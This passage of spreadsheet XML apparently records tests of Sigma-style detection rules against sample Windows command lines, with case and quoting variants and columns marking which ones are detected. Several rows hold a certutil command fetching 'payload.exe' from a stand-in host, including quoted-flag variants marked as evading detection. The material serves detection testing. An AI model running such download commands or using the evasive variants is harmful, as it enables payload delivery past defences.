    </row>
    <row r="1360" ht="15.75" customHeight="1" s="42">
      <c r="A1360" s="43" t="n"/>
      <c r="B1360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C1360" s="44" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1360" s="44" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E1360" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Get-HotFix"</t>
        </is>
      </c>
      <c r="F1360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1360" s="43" t="n"/>
      <c r="J1360" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1360" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1361" ht="15.75" customHeight="1" s="42">
      <c r="A1361" s="43" t="n"/>
      <c r="B1361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1361" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1361" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1361" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1361" s="43" t="n"/>
      <c r="J1361" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1361" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1362" ht="15.75" customHeight="1" s="42">
      <c r="A1362" s="43" t="n"/>
      <c r="B1362" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1362" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1362" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1362" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1362" s="43" t="n"/>
      <c r="J1362" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1362" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1363" ht="15.75" customHeight="1" s="42">
      <c r="A1363" s="43" t="n"/>
      <c r="B1363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1363" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1363" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1363" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1363" s="43" t="n"/>
      <c r="J1363" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1363" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1364" ht="15.75" customHeight="1" s="42">
      <c r="A1364" s="43" t="n"/>
      <c r="B1364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1364" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1364" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1364" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1364" s="43" t="n"/>
      <c r="J1364" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1364" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1365" ht="15.75" customHeight="1" s="42">
      <c r="A1365" s="43" t="n"/>
      <c r="B1365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1365" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1365" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1365" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1365" s="43" t="n"/>
      <c r="J1365" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1365" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1366" ht="15.75" customHeight="1" s="42">
      <c r="A1366" s="43" t="n"/>
      <c r="B1366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1366" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1366" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1366" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1366" s="43" t="n"/>
      <c r="J1366" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1366" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1367" ht="15.75" customHeight="1" s="42">
      <c r="A1367" s="43" t="n"/>
      <c r="B1367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1367" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1367" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1367" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1367" s="43" t="n"/>
      <c r="J1367" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1367" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1368" ht="15.75" customHeight="1" s="42">
      <c r="A1368" s="43" t="n"/>
      <c r="B1368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1368" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1368" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1368" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1368" s="43" t="n"/>
      <c r="J1368" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1368" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1369" ht="15.75" customHeight="1" s="42">
      <c r="A1369" s="43" t="n"/>
      <c r="B1369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1369" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1369" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1369" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1369" s="43" t="n"/>
      <c r="J1369" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1369" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1370" ht="15.75" customHeight="1" s="42">
      <c r="A1370" s="43" t="n"/>
      <c r="B1370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1370" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1370" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1370" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommANd "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1370" s="43" t="n"/>
      <c r="J1370" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1370" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1371" ht="15.75" customHeight="1" s="42">
      <c r="A1371" s="43" t="n"/>
      <c r="B1371" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1371" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1371" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1371" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnd "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1371" s="43" t="n"/>
      <c r="J1371" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1371" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1372" ht="15.75" customHeight="1" s="42">
      <c r="A1372" s="43" t="n"/>
      <c r="B1372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C1372" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D1372" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E1372" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F1372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1372" s="43" t="n"/>
      <c r="J1372" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1372" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1373" ht="15.75" customHeight="1" s="42">
      <c r="A1373" s="43" t="n"/>
      <c r="B1373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C1373" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1373" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E1373" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F1373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1373" s="43" t="n"/>
      <c r="J1373" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1373" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1374" ht="15.75" customHeight="1" s="42">
      <c r="A1374" s="43" t="n"/>
      <c r="B1374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C1374" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1374" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E1374" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F1374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1374" s="43" t="n"/>
      <c r="J1374" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1374" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1375" ht="15.75" customHeight="1" s="42">
      <c r="A1375" s="43" t="n"/>
      <c r="B1375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C1375" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1375" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E1375" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmand "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F1375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1375" s="43" t="n"/>
      <c r="J1375" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1375" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1376" ht="15.75" customHeight="1" s="42">
      <c r="A1376" s="43" t="n"/>
      <c r="B1376" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C1376" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1376" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E1376" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaND "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F1376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1376" s="43" t="n"/>
      <c r="J1376" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1376" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1377" ht="15.75" customHeight="1" s="42">
      <c r="A1377" s="43" t="n"/>
      <c r="B1377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C1377" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1377" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E1377" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F1377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1377" s="43" t="n"/>
      <c r="J1377" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1377" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1378" ht="15.75" customHeight="1" s="42">
      <c r="A1378" s="43" t="n"/>
      <c r="B1378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C1378" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1378" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E1378" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F1378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1378" s="44" t="n"/>
      <c r="J1378" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1378" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1379" ht="15.75" customHeight="1" s="42">
      <c r="A1379" s="43" t="n"/>
      <c r="B1379" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1379" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1379" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1379" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1379" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1379" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1379" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1379" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1380" ht="15.75" customHeight="1" s="42">
      <c r="A1380" s="43" t="n"/>
      <c r="B1380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1380" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1380" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1380" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1380" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1380" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1380" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1381" ht="15.75" customHeight="1" s="42">
      <c r="A1381" s="43" t="n"/>
      <c r="B1381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1381" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1381" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1381" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1381" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1381" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1381" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1382" ht="15.75" customHeight="1" s="42">
      <c r="A1382" s="43" t="n"/>
      <c r="B1382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1382" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1382" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1382" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1382" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1382" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1382" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1383" ht="15.75" customHeight="1" s="42">
      <c r="A1383" s="43" t="n"/>
      <c r="B1383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1383" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1383" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1383" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1383" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1383" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1383" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1383" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1384" ht="15.75" customHeight="1" s="42">
      <c r="A1384" s="43" t="n"/>
      <c r="B1384" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1384" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1384" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1384" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1384" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1384" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1384" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1384" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1385" ht="15.75" customHeight="1" s="42">
      <c r="A1385" s="43" t="n"/>
      <c r="B1385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1385" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1385" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1385" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1385" s="44" t="n"/>
      <c r="J1385" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1385" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1386" ht="15.75" customHeight="1" s="42">
      <c r="A1386" s="43" t="n"/>
      <c r="B1386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1386" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1386" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1386" s="44" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1386" s="44" t="n"/>
      <c r="J1386" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1387" ht="15.75" customHeight="1" s="42">
      <c r="A1387" s="43" t="n"/>
      <c r="B1387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1387" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1387" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1387" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1387" s="44" t="n"/>
      <c r="J1387" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1387" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1388" ht="15.75" customHeight="1" s="42">
      <c r="A1388" s="43" t="n"/>
      <c r="B1388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1388" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1388" s="44" t="inlineStr">
        <is>
